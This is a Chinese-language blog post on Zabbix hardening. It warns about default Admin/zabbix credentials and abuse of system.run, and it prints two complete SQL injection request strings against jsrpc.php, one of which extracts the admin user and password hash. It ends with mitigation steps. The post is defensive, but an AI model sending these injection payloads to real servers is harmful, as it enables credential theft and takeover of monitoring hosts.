zabbix系列之安全
https://blog.csdn.net/xiaoyu_0217/article/details/73500125
存在問題:
1)zabbix的Admin口令太弱或使用默認口令(Admin/zabbix),被攻擊後導致zabbix服務器暴露,攻擊者可創建”system.run[command,<mode>]”監控項執行命令,甚至獲取服務器shell,獲取root權限。
說明:system.run[command,<mode>]命令是agent自帶的,使zabbix server可遠程在agent機器上執行任意命令,如果為了方便把agent啟動用戶設置為root的話(AllowRoot=1)
2)最近爆出的zabbix漏洞,在url路徑(即http://****/zabbi/)後加以下代碼
/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
或
jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
輸出結果如下則表示存在漏洞:
http://www.freebuf.com/vuls/112197.html
以上為僅為漏洞驗證測試方式,攻擊者可以通過進一步構造語句進行錯誤型sql註射,無需獲取和破解加密的管理員密碼.漏洞具體利用
https://zhuanlan.zhihu.com/p/22082375
https://www.cnblogs.com/s0ky1xd/p/5874043.html
漏洞詳細說明:https://www.seebug.org/vuldb/ssvid-92302
措施:
1、很重要的一點,zabbix的登錄口令一定要復雜,不要用默認口令或弱口令。
2、zabbix的server和agent都不要以root啟動,不要設置AllowRoot=1。
3、禁止agent執行system.run,不要設置EnableRemoteCommands=1。
4、經常打安全補丁,如果系統內核版本過低有漏洞的話,即使在zabbix用戶下照樣能獲取root權限。
5.不要使用默認的 admin ,修改成其他的,guest登錄也取消吧補丁也打打吧
其他參考:
http://www.cnblogs.com/skyflask/p/7499925.html
zabbix系列之安全